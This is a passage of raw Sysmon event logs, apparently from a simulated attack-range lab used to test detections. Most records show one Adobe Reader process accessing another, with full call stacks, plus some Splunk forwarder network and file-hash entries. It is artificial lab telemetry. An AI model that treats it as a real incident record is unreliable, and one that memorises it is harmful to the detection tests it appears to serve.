(x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.066{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000047530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.575{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56482-false10.0.1.12-8000- 10341000x800000000000000047529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.015{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000018785Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:27.867{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4608EA08CD42FE7C9EE3CE42DBD751D2,SHA256=D99F9FB83ECC82AD1C4E64F1CD74142963522510F061B9D9278F46F89E027C22,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000047619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.948{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.948{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.901{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.901{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.854{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.854{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.807{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.807{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.807{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.760{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.760{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.714{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.714{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.667{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 